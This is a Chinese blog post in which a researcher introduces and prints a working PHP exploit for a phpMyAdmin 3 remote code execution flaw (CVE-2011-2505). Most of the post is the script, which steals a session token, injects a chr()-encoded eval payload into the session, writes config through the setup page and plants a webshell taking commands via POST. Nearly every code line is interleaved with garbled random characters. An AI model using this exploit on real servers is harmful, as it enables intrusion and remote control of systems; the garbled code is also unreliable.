最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp,由于我搞得晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
#!/usr/bin/php
$ X3 q$ U( [1 D6 E<?php) ?/ C: j4 ^$ y3 o0 }& r
print_r('
9 \/ i, j# ~' o4 @( ~2 ]+---------------------------------------------------------------------------++ `, P5 `1 j" `$ W$ l
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
& d/ D4 S2 ~, S) i% Jby oldjun(www.oldjun.com)
( W9 Q# i) k: Z5 h/ _: F W/ n" l& wwelcome to www.t00ls.net/ d; k% t" J# [7 ^2 S' O
mail: oldjun@gmail.com5 \# h% m5 z ?* a/ T& d! u
Assigned CVE id: CVE-2011-2505
3 ?7 ^: g% l* w+ @# y- h# b+---------------------------------------------------------------------------+
$ P' m8 G8 W. f- P');+ o5 Q3 L. s! P6 @) V8 x
2 E, L: z# G! r/**; V& r* d2 O! H4 R' y+ W5 D
* working when the directory:"config" exists and is writeable.
. p4 m+ T% b8 G, M6 K; l**/
4 o4 H+ _, O- l2 r) w9 T
5 B! I" M; \/ [8 Iif ($argc < 3) {
& c5 _# H4 T0 }0 i1 t print_r('% B/ F$ i8 d2 q, [+ B3 c }
+---------------------------------------------------------------------------+% a6 C( R3 h" l3 v$ K
Usage: php '.$argv[0].' host path
" w% {5 n u, D9 V" F7 N# O/ Zhost: target server (ip/hostname)" A5 ^. k. Z7 x5 E/ m! Q
path: path to pma33 Y# s( S' H) b. J% l, K% V6 b; ?
Example:) a8 g) b( D0 n9 C) G
php '.$argv[0].' localhost /pma/
7 M- D+ I/ n/ l+ A2 R+---------------------------------------------------------------------------+
+ ~" M: [6 T9 V7 }% [- ^');
% N- m4 A/ } P& P4 J exit;
" x8 j! \8 q* q _}4 \) P$ {/ x {" `5 x8 ~) {+ p
. v/ c3 }* S" R. T
$host = $argv[1];7 o( G& B: |5 s& b8 O0 y" j
$path = $argv[2];
) ^, G- T6 [8 q8 f7 j- S- X( s
2 K( o# i. S. A7 G: |/**1 l. M3 p+ o$ g5 U
* Try to determine if the directory:"config" exists
: F. a' D1 `4 t**/
9 o( t! Y j" w1 decho "[+] Try to determine if the directory:config exists....\n";
2 x! Z* |1 N. i$returnstr=php_request('config/');
/ X, ^2 g! j( Q! q- {7 Nif(strpos($returnstr,'404')){1 T" \8 v9 J+ A7 b$ e4 D6 s
exit("[-] Exploit Failed! The directory:config do not exists!\n");
; x! t! n4 r* Q* j( W4 w}0 i9 h/ O% Q% d0 `8 t! q% a! a
& u) H: I% ?) U ~/**3 `& Q0 T7 F6 B% V
* Try to get token and sessionid
$ _- o( G- L; g**/ [5 c1 o- H! o9 q! ~$ T# @
echo "[+] Try to get token and sessionid....\n";
2 p* ]# l L2 Y8 V8 Z- C8 b$result=php_request('index.php');
* {( h0 r* ?9 J2 P) npreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
' ^! _" O) D7 i: Z' Z% M! T$token=$resp[3];6 Q- v2 u; J% F" K! H9 X' s( A) A
$sessionid=$resp[1];& L0 Y! d2 E$ ~0 E; W
if($token && $sessionid){
* G/ h1 r$ i6 [4 y3 I echo "[+] token token\n";
* v7 z5 M& L- T7 v; `; R; ] echo "[+] Session ID sessionid\n";
7 B% X- P' J1 k" d% ^9 S9 s+ x}else{. X: J! V% i$ [/ c
exit("[-] Can't get token and Session ID,Exploit Failed!\n");9 i2 o0 o# w0 U; J
}
+ L1 n: B! ]* p/ l8 U( u5 b
' L" @1 g/ E: E3 b% k' L; M/ Y/**$ \/ N1 S( {5 F; }7 n
* Try to insert shell into session6 {% C: }( Y7 C' |
**/; u( O4 z9 X# y2 u5 ]
echo "[+] Try to insert shell into session....\n";' m2 K0 R) U' B j/ a3 S
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
) R) Q6 I9 X& R3 P9 L6 {! Q; s; z/ b. `& r, W {$ w
/**! x- c" r0 n& k! o# v% t1 h" k
* Try to create webshell" t/ I4 Z9 Q& h
**/2 x; K0 r2 F O0 Y3 Q. b: Q
echo "[+] Try to create webshell....\n";
$ o2 L+ ]+ |, U' P, bphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);9 k& ^/ i: k# b' K% k
/**$ s! ?+ B' t' {! f3 n0 K( i/ Q2 I
* Try to check if the webshell was created successfully `8 K' ?0 h8 I3 Q5 q8 C
**/
) Q# D; ]9 W6 T8 fecho "[+] Try to check if the webshell was created successfully....\n";$ ^! w4 f6 F/ e5 R- q
$content=php_request('config/config.inc.php');
! N I! G- T2 j" x; Dif(strpos($content,'t00ls')){1 u) B2 |! B1 P7 W; ?$ k
echo "[+] Congratulations! Expoilt successfully....\n"; a5 n7 j9 P8 N* O# a# U
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
5 p- `* c# n/ u0 j6 _}else{
! S$ x6 f/ \7 H5 b. W. h( w* y exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
$ }) j& L4 }) p/ R5 w5 H}
8 |7 M; f% |) C" J
8 A7 @. t8 W$ |/ }function php_request($url,$data='',$cookie=''){# v2 c, j2 M+ b5 c* D1 z J
global $host, $path;
* y1 }0 P# K- R7 \3 v7 c6 h3 N% a, |/ O * R b' }) G' @& d8 f6 t
$method=$data?'POST':'GET';& `* `0 Z6 z% V- X2 r2 y; ~7 Q& z
0 G0 [. o E# {: A& Y $packet = $method." ".$path.$url." HTTP/1.1\r\n";7 e5 M7 l' O3 P4 G9 G4 M/ \3 A8 \
$packet .= "Accept: */*\r\n";! S& B* m+ e, v4 V7 x: h
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";6 p/ O. o5 `" r3 q
$packet .= "Host: $host\r\n";, k" E2 O. M: k) v
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";% Q& ?6 S2 b$ d* j8 w4 p: S: v
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";0 N v9 a. K! t
$packet .= $cookie?"Cookie: $cookie\r\n":"";
& q) i( Z7 j9 y5 W; Y $packet .= "Connection: Close\r\n\r\n";
0 S, j- Y. D P" Y: p% f) C $packet .= $data?$data:"";3 }& G5 U$ g+ S) U/ l
9 w$ e. V q! `: P0 {& a
$fp = fsockopen(gethostbyname($host), 80);' M8 Z; v# j* T8 r; c3 S$ K$ e& F' R
if (!$fp) {" C3 R3 F7 I! C/ a+ ]9 ^6 I7 t
echo 'No response from '.$host; die;
0 N& s& r: e9 x- \2 B- p% L }
) N0 r- J! D; Y* `% ]) {; j7 E fputs($fp, $packet);& q3 k6 g2 H L+ J5 Z, ?' N" O
' |- j6 ?3 T- p- J
$resp = '';
9 D8 ?' G2 D: ~& X8 l% D7 G' K
* s0 A4 @' d6 P- ]3 P4 s while ($fp && !feof($fp))9 \4 V- }8 o8 _: x0 D
$resp .= fread($fp, 1024);- b# Y' l5 h, L# |/ ?) U
, j. Q+ C' \" a( W! U6 B return $resp;- H( y2 N/ h; z" {9 n) o9 ]6 I
}
4 J3 Z: h4 B+ E* N' O( h# x
2 o: E1 P$ Z' e! X& l?> " E$ J5 [& g2 ]. p- ~/ a }
. |